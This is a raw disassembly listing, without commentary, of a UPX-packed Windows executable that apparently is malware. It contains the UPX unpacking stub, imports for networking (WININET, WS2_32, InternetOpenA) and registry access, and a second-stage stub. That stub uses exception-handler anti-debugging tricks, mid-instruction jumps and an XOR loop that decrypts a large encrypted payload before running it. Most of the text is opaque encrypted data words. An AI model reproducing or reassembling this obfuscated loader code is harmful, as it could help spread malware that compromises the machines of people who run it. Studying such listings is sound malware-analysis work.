dd 410275C9h, 0AF1C0053h, 947B221Ch, 0C606EB01h, 0FF9BFFF9h
dd 73255C5Ch, 6370695Ch, 0EC816624h, 0E4FF071Ch, 44655300h
dd 67756265h, 753518FAh, 67997669h, 6A6441A7h, 52D93375h
dd 6F546137h, 73176EE0h, 6DC93FBBh, 75126F4Ch, 6C615670h
dd 17416575h, 1A91704Fh, 6F287EDBh, 34732463h, 62A54300h
dd 6176D4B0h, 79E3333Fh, 46CA205Ah, 65C46D4Ch, 37F12BAAh
dd 72545F11h, 35577961h, 5B774317h, 61315B6Ah, 6F68521Ah
dd 0C685405h, 3AA546B6h, 0DB735614h, 66DA4158h, 4F28D6EAh
dd 3A777845h, 0E8D1356Eh, 0F547CF4Bh, 54481EF3h, 0DE7F5054h
dd 3C2E25FBh, 20573220h, 0A0D4B4Fh, 76D54B01h, 449FA56Bh
dd 44C2D02h, 0CD94B067h, 203AA5BEh, 2F187525h, 0B5B56D28h
dd 0B57954F6h, 0AE70A326h, 0DAB51D63h, 2F15834Ch, 632DC702h
dd 9353DCADh, 57C7C972h, 8546B647h, 0F42B0016h, 0AFF664F6h
dd 0CBE58F74h, 736D8D73h, 16A96376h, 0CB8596A7h, 3F16977h
dd 0EFEE9A69h, 75175F32h, 33033431h, 0C5CF3132h, 3930A5BAh
dd 0D11B3817h, 64190607h, 31323390h, 0D484D430h, 0B7783541h
dd 67FFCA3Ah, 7F9D90ADh, 54464F53h, 45524157h, 1F694D5Ch
dd 0C5ADB62Ch, 835C9B6Fh, 7275435Ch, 0BA015DC3h, 9656D972h
dd 75525CCEh, 0ED0C388h, 0C055A08Bh, 9B9236Bh, 66647FF9h
dd 6E687361h, 6473647Ah, 0C49536Ch, 0C25EC25Bh, 96C0E57h
dd 142B95B9h, 0BF57225Bh, 0EE0D4449h, 2053B806h, 20670A43h
dd 76E7E576h, 0CADBD9Eh, 9D322C10h, 64532063h, 10E6D92Fh
dd 1A1B6544h, 0B7337E87h, 1217232Ch, 35737983h, 1C3F1B1Ah
dd 200F4200h, 8D6A0D6Bh, 1323AC5Bh, 24206D1Bh, 80C02C06h
dd 44375E15h, 9EC9208Ch, 66BA6DBBh, 9C6D672Fh, 0F6B1632Ah
dd 63246C2Fh, 7974690Ah, 6E614D20h, 2A6B1A1Eh, 0AE13B0h
dd 36DE53C4h, 0B440A718h, 0C65A046h, 32DB1B80h, 1B470DC1h
dd 4DB76F4Dh, 654FDD37h, 614E3346h, 6C01306Dh, 0BD6372CBh
dd 5D01AE0Bh, 79704B0Ah, 1B724D19h, 0F0BD0ACEh, 0D8163265h
dd 492E9A36h, 702F6C6Fh, 70C45354h, 50AD482Dh, 641913B3h
dd 57533512h, 0FE33268h, 0B355754h, 2CCC1603h, 744E2118h
dd 0B5D0EE74h, 5D616960h, 0D8912349h, 4F4B6DA1h, 61630A64h
dd 0B0B6A34h, 76457B9Fh, 3461810Ch, 0BA536546h, 0B404ADEDh
dd 6A624F91h, 7214748Ch, 562E6858h, 0D03F2DBCh, 62F7B048h
dd 3A0CAA25h, 0DEE0D118h, 6E08DB61h, 0F94D61DBh, 9C743598h
dd 634744BCh, 571479BDh, 0D956B5AAh, 32842B1Fh, 0B26CC60Fh
dd 6509535Bh, 216EA770h, 25CF5BC8h, 0B12D40Bh, 0C2BD6496h
dd 0F72B11Fh, 62694C1Bh, 0D73552FAh, 2BA09B06h, 13676D4Dh
dd 60210166h, 12BA8291h, 63CE3616h, 7C6B4554h, 1ACD0475h
dd 0A54DEBB6h, 8E0D4178h, 9B25ED08h, 39AF5D0Dh, 879582Dh
dd 453862B3h, 0DCF03178h, 5527704h, 508652Eh, 4EBB3607h
dd 9122657Ah, 0B5B4C14Ch, 0E645BBB6h, 65440DADh, 6C9BEC49h
dd 47D15A04h, 70119867h, 654BFCEEh, 7D104579h, 0DAD61274h
dd 0A510F61h, 0CD8B11EDh, 3095F602h, 0D010215Ah, 0C230EF6Eh
dd 62410C51h, 56A6B7Bh, 0FB97A082h, 73FD6E38h, 16102D9Dh
dd 28487774h, 0F6D9AF10h, 12440A05h, 86610E61h, 69ED8EB5h
dd 67D77966h, 362B757Ah, 0D0DBD85Bh, 796FC56Ch, 406F112Ch
dd 10D9DC21h, 43C18F52h, 83E3D9FEh, 6341149Fh, 72697571h
dd 61D2B9C1h, 0A020494Dh, 0CDB133Ah, 0E8DE669Fh, 6C17273h
dd 62C5B26Dh, 0E2C4738h, 68560F74h, 4D53AE67h, 65445F1Dh
dd 0C0CC5C3Fh, 0ED685FE1h, 380227ACh, 7C6150Bh, 0E90FA563h
dd 0A6AE598Ch, 343046AFh, 40330D14h, 0C165FCC7h, 30984115h
dd 0DE0A148Bh, 6C2B76C1h, 676649B9h, 66B10570h, 441C4F41h
dd 20F4CD3Ah, 0B600D64h, 55851EDBh, 0E11419Bh, 290961B8h
dd 336B1449h, 335325Ch, 53A32B6Eh, 111A8174h, 542C648Bh
dd 6D9659C0h, 73FF2353h, 10D0202h, 65965965h, 17346F39h
dd 5965950Ch, 13040996h, 0B66F1610h, 50E9183Ah, 0EC4C4945h
dd 4640D211h, 0FD3A1E5Fh, 10B01E0h, 60B17406h, 1324CECFh
dd 250B22DFh, 14AFA12Dh, 0FD020BF7h, 9BD96E67h, 1E0C5007h
dd 65E01034h, 607606Fh, 0FB2C9400h, 85590805h, 178648Ch
dd 0E3C0351Eh, 0A552E0Ah, 46460923h, 0CA249083h, 7B720B52h
dd 2EE004BCh, 0F4FBE164h, 0D7E22B0Fh, 2728EC2Dh, 9804C016h
dd 8000002Eh, 20AE0D59h, 0FF000001h, 0
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_30905000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_30906B22
; ---------------------------------------------------------------------------
align 8
loc_30906B18: ; CODE XREF: UPX1:loc_30906B29�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_30906B1E: ; CODE XREF: UPX1:30906BB6�j
; UPX1:30906BCD�j
add ebx, ebx
jnz short loc_30906B29
loc_30906B22: ; CODE XREF: UPX1:30906B10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B29: ; CODE XREF: UPX1:30906B20�j
jb short loc_30906B18
mov eax, 1
loc_30906B30: ; CODE XREF: UPX1:30906B3F�j
; UPX1:30906B4A�j
add ebx, ebx
jnz short loc_30906B3B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B3B: ; CODE XREF: UPX1:30906B32�j
adc eax, eax
add ebx, ebx
jnb short loc_30906B30
jnz short loc_30906B4C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B30
loc_30906B4C: ; CODE XREF: UPX1:30906B41�j
xor ecx, ecx
sub eax, 3
jb short loc_30906B60
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_30906BD2
mov ebp, eax
loc_30906B60: ; CODE XREF: UPX1:30906B51�j
add ebx, ebx
jnz short loc_30906B6B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B6B: ; CODE XREF: UPX1:30906B62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_30906B78
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B78: ; CODE XREF: UPX1:30906B6F�j
adc ecx, ecx
jnz short loc_30906B9C
inc ecx
loc_30906B7D: ; CODE XREF: UPX1:30906B8C�j
; UPX1:30906B97�j
add ebx, ebx
jnz short loc_30906B88
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B88: ; CODE XREF: UPX1:30906B7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_30906B7D
jnz short loc_30906B99
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B7D
loc_30906B99: ; CODE XREF: UPX1:30906B8E�j
add ecx, 2
loc_30906B9C: ; CODE XREF: UPX1:30906B7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_30906BBC
loc_30906BAD: ; CODE XREF: UPX1:30906BB4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_30906BAD
jmp loc_30906B1E
; ---------------------------------------------------------------------------
align 4
loc_30906BBC: ; CODE XREF: UPX1:30906BAB�j
; UPX1:30906BC9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_30906BBC
add edi, ecx
jmp loc_30906B1E
; ---------------------------------------------------------------------------
loc_30906BD2: ; CODE XREF: UPX1:30906B5C�j
pop esi
mov edi, esi
mov ecx, 86h
loc_30906BDA: ; CODE XREF: UPX1:30906BE1�j
; UPX1:30906BE6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_30906BDF: ; CODE XREF: UPX1:30906C04�j
cmp al, 1
ja short loc_30906BDA
cmp byte ptr [edi], 1
jnz short loc_30906BDA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_30906BDF
lea edi, [esi+4000h]
loc_30906C0C: ; CODE XREF: UPX1:30906C2E�j
mov eax, [edi]
or eax, eax
jz short loc_30906C57
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_30906C29: ; CODE XREF: UPX1:30906C4F�j
mov al, [edi]
inc edi
or al, al
jz short loc_30906C0C
mov ecx, edi
jns short near ptr loc_30906C3A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_30906C3A: ; CODE XREF: UPX1:30906C32�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_30906C51
mov [ebx], eax
add ebx, 4
jmp short loc_30906C29
; ---------------------------------------------------------------------------
loc_30906C51: ; CODE XREF: UPX1:30906C48�j
call dword ptr [esi+6094h]
loc_30906C57: ; CODE XREF: UPX1:30906C10�j
popa
jmp loc_309022DF
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00010000 ( 65536.)
; Section size in file : 00010000 ( 65536.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 30907000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dword_3090708C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_30909891+52�r
dd 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 50000387h, 6B000000h, 0
db 90h
db 30h, 0, 1Eh
db 2 dup(0), 30h
; =============== S U B R O U T I N E =======================================
sub_3090727F proc near ; CODE XREF: UPX2:309072BC�p
pusha
push ebp
mov ebp, esp
call loc_3090729B
call sub_30907310
mov ebp, fs:0
lea ebp, [ebp+8]
jmp near ptr loc_309072C1+1
sub_3090727F endp
; ---------------------------------------------------------------------------
loc_3090729B: ; CODE XREF: sub_3090727F+4�p
push dword ptr fs:0
mov fs:0, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push 80000000h
push ecx
push 80000000h
push ecx
push ecx
push ecx
push ecx
call sub_3090727F
loc_309072C1: ; CODE XREF: sub_3090727F+17�j
xor [ecx], ch
sar dh, 0C8h ; CODE XREF: UPX2:309072CA�j
or al, al
jz short loc_309072CE
jnz short near ptr loc_309072C3+1
jmp short loc_30907335
; ---------------------------------------------------------------------------
loc_309072CE: ; CODE XREF: UPX2:309072C8�j
sub edx, edx
sub ecx, ecx
mov cl, 5Ah
loc_309072D4: ; CODE XREF: UPX2:309072D6�j
inc edx
dec ecx
jnz short loc_309072D4
call $+5
pop ecx
sub ecx, 0FFFFFFC0h
push ecx
mov esi, 2394h
loc_309072EA: ; CODE XREF: UPX2:309072F9�j
xchg al, [ecx]
xor ax, dx
mov [ecx], al
inc ecx
inc edx
sub esi, 1
cmp esi, 0
jnz short loc_309072EA
pop ecx
mov esp, fs:0
pop dword ptr fs:0
leave
mov [esp+18h], ecx
popa
jmp ecx
; =============== S U B R O U T I N E =======================================
sub_30907310 proc near ; CODE XREF: sub_3090727F+9�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_30907310 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retf 5CB3h
; ---------------------------------------------------------------------------
dd 215F5E5Dh, 934766EAh, 6844E2E5h, 6C6B6A69h, 70F7E7EDh
; ---------------------------------------------------------------------------
pop eax
loc_30907335: ; CODE XREF: UPX2:309072CC�j
jb short loc_309073AA
jmp fword ptr [ecx]
; ---------------------------------------------------------------------------
db 52h, 73h, 0Ch
dd 0F5228654h, 80567ACDh, 8C3B0B81h, 88786ACh, 8CA80231h
dd 9DFA668Dh, 0B71A0A92h, 0C31C9695h, 77A8659Bh, 2A071595h
dd 5BA3A282h, 23F2FD96h, 88C72B41h, 0B0AFABA9h, 0B45033B1h
dd 39484945h, 0FCABBC54h, 0E4C335BDh, 50764FC5h, 71C786F6h
dd 0CCCBCAC9h, 0AB4E6A3Eh, 0BDBB869Fh, 53DAA3A6h, 0D856E69Ah
dd 0D85EB8C5h, 0EC97A7B1h
db 64h, 0Dh
; ---------------------------------------------------------------------------
loc_309073AA: ; CODE XREF: UPX2:loc_30907335�j
out 0E9h, eax
jmp near ptr 969F129Bh
; ---------------------------------------------------------------------------
db 0BEh, 97h, 0F3h
dd 0D4817922h, 0FBEFBC7Eh, 0FF56AB0Ah, 0FF877F3Eh, 70664501h
dd 70861470h, 63795A0Ah, 91067B6Eh, 70521569h, 1D636471h
dd 4142FAFBh, 41337DEh, 7D0750AAh, 9F28D526h, 56A0642Dh
dd 0BBD42D31h, 0C730B505h, 38373ADDh, 53577939h, 21775B4Eh
dd 212F262Fh, 9EB81545h, 78DFCFC0h, 5DA74E0Dh, 17535251h
dd 2C363327h, 392D1F3Ch, 601E2A33h, 0EDB59D32h, 2853FEE0h
dd 6C668269h, 15286E6Dh, 7123E05h, 0A053301h, 2F7B0816h
dd 5F6A882h, 84C3B61Dh, 8887F66Dh, 0F84B0F89h, 570DEACh
dd 94D3A60Dh, 88E25610h, 8D501F14h, 0F0159EDDh, 0A4CD4A5Eh
dd 0D44CA6A5h, 983F3F56h, 3558AEEDh, 0B4F3813Bh, 38B7B6B5h
dd 936A4CDh, 0C0FF8D33h, 0C0E7BE4Ah, 554C6361h, 0CC8BF3CFh
dd 0E9C57B46h, 6958D291h, 0D897EFDBh, 0B6811984h, 8ADFB4DDh
dd 8CE388E1h, 0E8E3E6E4h, 0EC812E62h, 7BE384BDh, 0A2110D35h
dd 0F8C4A9A1h, 1432C9F9h, 0FF000127h, 1599978Ch, 59550645h
dd 99F45A58h, 104F3A95h, 0D733D692h, 0A7AEE49Fh, 2C1B1A38h
dd 0F61D5E0Dh, 5CE0DBC3h, 0DD1B73DEh, 6F63FA31h, 0D012C6B0h
dd 11B8A229h, 589F5391h, 0F9353DE1h, 60D71C5Dh, 0E47EDBD8h
dd 252FF609h, 0CC160CA4h, 7DAECD75h, 946F72F4h, 0D0A197ADh
dd 1C9309E0h, 0AC6291BAh, 0A5EB32CDh, 0C0089F5h, 0AC23BAE5h
dd 0BA5399DEh, 9CB8E129h, 109F168Dh, 81BAF28h, 82BF4E85h
dd 0EE0B9270h, 487A89FDh, 0C9C31AE4h, 25233175h, 8364FD76h
dd 0E87F53E0h, 33D8CA01h, 803DE79Ch, 0A4C63339h, 0C5CF16CDh
dd 2CF12264h, 0EF22ED95h, 1457A14Bh, 0D0353AC6h, 712A2A52h
dd 0A00D9690h, 4FE02159h, 38F8BF41h, 5B9F5D6Fh, 71E77D9Dh
dd 0FC4EBDC9h, 3B3FE619h, 5C96AAC5h, 3EB16A6Ah, 8EFC0D86h
dd 608E7C9Dh, 0ACA33EB1h, 51C75EBDh, 0DC6E9DE9h, 1D1FC639h
dd 15B7A5E1h, 4AA831BBh, 4E34299h, 826FF27Dh, 0C0AB1B51h
dd 0E026D462h, 951B8361h, 0D06A99EDh, 34D30AF5h, 0B62EAFh
dd 1003A746h, 0CDA7D61Dh, 563FA71h, 6FF8606Dh, 5762A243h
dd 0A7D52CC7h, 3CC67E74h, 0A366E585h, 0F9487C14h, 0A86F82F5h
dd 0D5879511h, 1898018Bh, 0D45BC24Fh, 74FB72E3h, 896C0ACDh
dd 40B75A05h, 73A5C774h, 413C965Dh, 990B07BCh, 0DBF6DE15h
dd 0F63C0AFAh, 0A51C068Dh, 3CF31FF1h, 855341C5h, 0FF46DE7h
dd 28DA5A78h, 4DB3A5D1h, 249BB3Ah, 911002C9h, 0F83FD32Dh
dd 5352BABEh, 0C00495A0h, 94AE3939h, 0B7CF16E8h, 0E96C7B81h
dd 10C72DD7h, 18FAF22h, 0D1BCC60Dh, 73729B9Eh, 0A024C180h
dd 3A5F3A59h, 9522C942h, 0CC32F37h, 708DB17Eh, 24249B3Fh
dd 0BBDE2529h, 6510CA6Bh, 0AA778432h, 93DE7F61h, 0B18F5688h
dd 2CA33AAEh, 544A8A5Eh, 8B049CA4h, 15B4E0F2h, 0BC33E725h
dd 8B31CE45h, 0AF8F5514h, 8EC3124Fh, 0A6B838FAh, 0D905D635h
dd 58908209h, 0BC746687h, 5CBB4AABh, 6ABF2EA5h, 4EF963F9h
dd 5DB08653h, 0EC23CF49h, 0D0C31D4Dh, 0B4528041h, 320BCDCDh
dd 163FE1E1h, 0A9764C5h, 44A100DBh, 0A8469455h, 0DD03F011h
dd 0F37011Fh, 946EFEDCh, 0BDE679ADh, 5517057Eh, 0CD089118h
dd 24FB724Ch, 82462F1Dh, 43A8BA31h, 3DC67BA6h, 0F43BF269h
dd 0CBC8300h, 0DC4C2AE1h, 0B86CDB48h, 7B599259h, 28DB8268h
dd 4CD5B2D1h, 5FEB3EB5h, 64EE69E6h, 8E16943Dh, 0BB36A628h
dd 0EC56F840h, 0A46AD74Ch, 0E85AA98Dh, 0E5E33AC5h, 50B3BA10h
dd 5EEF72A9h, 27A0AC6Dh, 0BC46AEF4h, 0BFD70B05h, 0AEDDED2Ch
dd 0A3F960BFh, 5E827045h, 70E76F1Dh, 10BE11C9h, 0DF4AC448h
dd 0EA7AF851h, 0A712820Ch, 1B3DF21Ch, 48BBB208h, 7A67B1B1h
dd 6970883h, 5C6E9DBEh, 1B1FC638h, 4364BAE5h, 60635AD0h
dd 6E8B7899h, 20FA097Fh, 75439A65h, 0B027BF1Dh, 1DFAA99Eh
dd 2FAB42E1h, 69D7DF3Eh, 0F6842EE5h, 113F973Ah, 9C4FD61Dh
dd 0E4F60526h, 1507DE20h, 0F267D6E9h, 2ADBB84Eh, 5887950Fh
dd 0A97648Dh, 445EADF3h, 2D2FF608h, 1FDFEED1h, 0F063BF9Dh
dd 4592F149h, 0BD86164Eh, 1CD33F15h, 81764690h, 64EB7FE4h
dd 0DE5FC24Dh, 0FF73EA60h, 0E4874BAAh, 34FEE229h, 0E79072D4h
dd 0B3BB0ED5h, 0E0E2DA40h, 79A17A19h, 97BC8902h, 0CF7CE44h
dd 0B13FD5B5h, 149A2A4Dh, 6D80B16Dh, 0DC13FED5h, 7FCBA9CCh
dd 0FC73EAC6h, 48E674DDh, 6CEFAEF1h, 10871F95h, 34BB22A9h
dd 0D85FC64Dh, 0FC506061h, 0B341DF05h, 0F0EB47A6h, 710436FDh
dd 79439E3Dh, 0B3099C0Eh, 27BA0095h, 0D55EE848h, 0FE5CEE64h
dd 0B4148B0Fh, 0D73CAE0Ah, 78EE5BAFh, 5ECA6CEEh, 3CC72BA1h
dd 1889169Ah, 0DB1FE868h, 0C852CF53h, 4C3E8820h, 478B53FCh
dd 9C0E930Fh, 0A02A9C34h, 0C046F350h, 0F375EB79h, 0ABC66ACh
dd 39A72BA4h, 63D85CF5h, 65D841DCh, 0AD3D955Dh, 0BE068E10h
dd 0E468F370h, 0C653F64Ch, 58BB27A8h, 1D9618A2h, 8C36BF1h
dd 20AA37ABh, 0CD5DF53Dh, 0D866EE70h, 980B911Ah, 0E72BAE2Ch
dd 59D1759Fh, 73FB79F1h, 38B26E91h, 0CBF0690h, 0EC6EF36Fh
dd 0C04AFC31h, 0BD2E8A30h, 0A714B60Ch, 7DEB75F4h, 51DA7ECCh
dd 0C5904EA0h, 0E862D46Dh, 1C9B3798h, 39A133A3h, 71D45BC1h
dd 60FE4589h, 9D138F2Bh, 0B929A312h, 0F452E925h, 0C147DB7Fh
dd 2DA23F89h, 18863DF1h, 65E371D8h, 55F347C5h, 0BD33A223h
dd 9934EA20h, 8D72DA71h, 0A8229429h, 45CE78D8h, 4B835BF4h
dd 15B30A90h, 358B32A4h, 0B87ECE59h, 0CA67EF46h, 0A9049C00h
dd 0A36B9C16h, 6DD962F8h, 43CA49C3h, 11BF1BBBh, 15942EE9h
dd 0FA76CA69h, 0C541CB53h, 411ACE04h, 61E244E9h, 0AE09B90Ah
dd 0CC26B638h, 0DE42CE7Ah, 0F177EB4Fh, 88F07A0h, 1DB424A8h
dd 65C761A5h, 4BD962D7h, 0BB3CB33Eh, 8311AA71h, 0E374FB76h
dd 0DD7D901Ah, 58AB35BFh, 1F9C18B1h, 53E47DE0h, 3CAE1CEBh
dd 0CD7CB649h, 0E06ADC65h, 8413BF10h, 0A139AB3Bh, 79CC43D9h
dd 68F65981h, 259B07A3h, 1861BADh, 0ED63C51Dh, 0FF23CA54h
dd 0B533AD2Ch, 9912B604h, 5EF052E8h, 68D646C8h, 0A0B223ACh
dd 0E566FC4Ch, 0D86208Dh, 0AA515A6h, 30C252DCh, 60E96BDFh
dd 0B9138718h, 0BF3CA62Dh, 0E945F925h, 0CD6DD74Dh, 6CF33B1h
dd 6873B85h, 40F36DE0h, 5DCD4BDBh, 0BD38A321h, 971CBE12h
dd 0AE17E060h, 0A139912Dh, 6ECA42DCh, 0CE676F8h, 2A40ABBh
dd 31AF23ACh, 0DB50D47Dh, 9C60F964h, 0B2349A2Bh, 811F931Ch
dd 6BE064CDh, 69D049D4h, 24895EADh, 159E10AAh, 0FD4CE379h
dd 0D35ADE42h, 5419CE2Bh, 52FB73D4h, 0A7189314h, 0AF268937h
dd 0DE48D741h, 0DB6FCC09h, 3E91039Dh, 5CB626A8h, 70F85AEBh
dd 56FB5CDCh, 0BB2AB532h, 870CAE02h, 0DE07F070h, 0DB49F25Dh
dd 2CBC23B9h, 88103B7h, 2DFB6FF0h, 36A43FBCh, 0DC61B644h
dd 0F86AE846h, 820EA810h, 0B83AB73Dh, 57D243E0h, 4E9373F3h
dd 2EA20291h, 841190h, 0FA7BC578h, 0F844D458h, 0A3299F3Ah
dd 860FB100h, 18F868E4h, 6FF279F6h, 0D4A52FB1h, 0E70BE26Ch
dd 0D9C1991h, 27A035A2h, 53A74AD0h, 71F56CE6h, 9F7F920Eh
dd 0B33BBE24h, 0F955DA56h, 0C146D357h, 2BAA24DDh, 9907A87h
dd 63877AFBh, 51D041C6h, 0B616C639h, 92018F15h, 8C54FA60h
dd 8C2EA136h, 44CB58DCh, 62CA1AF4h, 1E951B81h, 319C36ACh
dd 0D650E559h, 0E870EF6Fh, 0B4248A00h, 0E40E8618h, 6DFB78D4h
dd 58C654C3h, 3EA22E9Ah
dd 1AB262A8h, 0F66DE379h, 0CC7CDE44h, 5202A020h, 4D8B53F5h
dd 9A0A8213h, 9E37BF3Fh, 0F643DF50h, 947EEE60h, 39A922ACh
dd 6EE00391h, 4CFB6A8Bh, 43CE60B9h, 0BB20BA1Eh, 9506B114h
dd 0F762CC15h, 0DA5ED266h, 1DA62386h, 2EF32B99h, 15C669E0h
dd 12B220BCh, 0CD5ADA5Ch, 8C42E254h, 0A3009B27h, 0B50DB62Ch
dd 7DDA53C1h, 9F934BF9h, 88DC6B0Ch, 64EB1AA8h, 0C4827E1Dh
dd 0AC49B915h, 8016DB3Fh, 7F7E883Ah, 0CC145641h, 7CD97EF1h
dd 5F841C94h, 0C43EDA8Ch, 642BF5FDh, 798FCF2Eh, 0F4243EF5h
dd 99CCC181h, 0B86A6FE8h, 8CACF941h, 8E5DAE4Fh, 90D727C6h
dd 884A569Dh, 6C73FEFEh, 78D71E95h, 34BB4B8Bh, 0D83512C6h
dd 0BC1926EAh, 0F0178E6Dh, 9649B859h, 0AC736D7h, 66831AF8h
dd 20B42FF5h, 61E7D736h, 0E160A66Dh, 0A8871FFEh, 3FF2EE25h
dd 69E0AE0Dh, 8CF03C1h, 0B92E3652h, 50874ED5h, 27ACB3EAh
dd 1D9454F2h, 0BC739F0Dh, 2BA41C8h, 50631299h, 63900982h
dd 8C769AD4h, 8AA83335h, 7C1B822Ah, 870099AEh, 69E3CF4Ah
dd 8F3A2EE5h, 24AB11F8h, 37B0E4B5h, 0D8E6718Eh, 1507DE20h
dd 3930D6E9h, 58FC0842h, 83EE82E1h, 0A71CF17Ah, 0AC9E9186h
dd 0A82FB63Dh, 63EE1B4Ch, 0C367BE6Ch, 0C9DE4F80h, 69BF66B0h
dd 4CC25BD5h, 0D5083FB4h, 64AB463Dh, 772B929Ah, 0EC172EA4h
dd 0D4858355h, 0F493B769h, 459F068Dh, 26ADC720h, 5FBD4E85h
dd 9DE20794h, 3ABF76BDh, 4CE77A1Ch, 0F4243E9Fh, 915C6485h
dd 0F83FFC42h, 5994EA8Ch, 8077B414h, 0A401B21Dh, 52A59580h
dd 6CEA92A9h, 520A1E95h, 0FD4588C8h, 0B19C3638h, 0BC4674F4h
dd 0E8938B05h, 51C29051h, 28EF0323h, 5940F866h, 70E77E1Dh
dd 0B95A1FC9h, 0B87FBC55h, 0A9B1178Ah, 0BCF4EE25h, 0EB6BFA5Dh
dd 88FAF19h, 244FBBB1h, 4C75ED7h, 74FA6681h, 708A790Dh
dd 3733EA15h, 4D343B9h, 48B139Dh, 6F9C2Dh, 0CC43DA55h
dd 0B073EC63h, 708E7D5Eh, 4BFF26D9h, 5844C708h, 51B72EA4h
dd 75A958E8h, 0C827D737h, 0BE23FA71h, 0A4B30BEAh, 31ADA269h
dd 884323Bh, 7DF702B5h, 9FC00E85h, 46EB766Dh, 3DD0B63Dh
dd 8C43AF91h, 84A77B2Ch, 844F215Fh, 38D5F226h, 4AC45BD3h
dd 75D3FB1Ah, 0E1B272B9h, 0DEDFE3DDh, 98B72FCEh, 87CADE15h
dd 9E2CB02Dh, 8F125EC9h, 3CB32BA5h, 0CA177D6Eh, 2FF8CB09h
dd 38BF26ADh, 1E930A81h, 41BAB4Ah, 0D01A02C9h, 0F87FE465h
dd 0D477BEBEh, 0B5473BDAh, 5B78B279h, 8FA2648h, 682127F1h
dd 1AB99E95h, 0BFFD23DCh, 984A9EC0h, 716A0961h, 0A0078E90h
dd 929AD159h, 0E82BE442h, 0D9C929Eh, 0F4E87EF5h, 54DB43D9h
dd 0CD0598ADh, 0A293CC11h, 0C1F3E165h, 646BF278h, 0F9FA36A3h
dd 7C9DBBF7h, 2580109Ch, 0B234E9ABh, 0B350874Bh, 0BC59FBEFh
dd 0DF049814h, 44BE7A0Ch, 2954AF7Dh, 0CC9C5F5Eh, 35AABE35h
dd 945B9F18h, 74976687h, 0CD34AC1h, 6822D1F6h, 19AB728Ch
dd 0C84FD651h, 0ECDC7F7Eh, 21EE9E15h, 353BA229h, 118D16F3h
dd 0D97665B7h, 0E3970E85h, 78675A1Fh, 31ABB930h, 0B0039A11h
dd 5C948B55h, 5154F875h, 38BF2621h, 3CB3072Ch, 61CA4EC5h
dd 119F179Eh, 0A8333A62h, 0D2A2C644h, 0A42FFEAAh, 750A971Dh
dd 22EF05F3h, 54C6058Eh, 0A0280903h, 94B1A316h, 9FEF76DAh
dd 0D93C0833h, 30E70BA1h, 44CBC2BAh, 0F197B63Dh, 9853CA41h
dd 0EC59D94Ah, 0A44FD356h, 7DB7C322h, 0AC667AB1h, 0D9B428E1h
dd 119A720h, 0B00EC60Dh, 7C73E861h, 0B041DF54h, 0F13747A6h
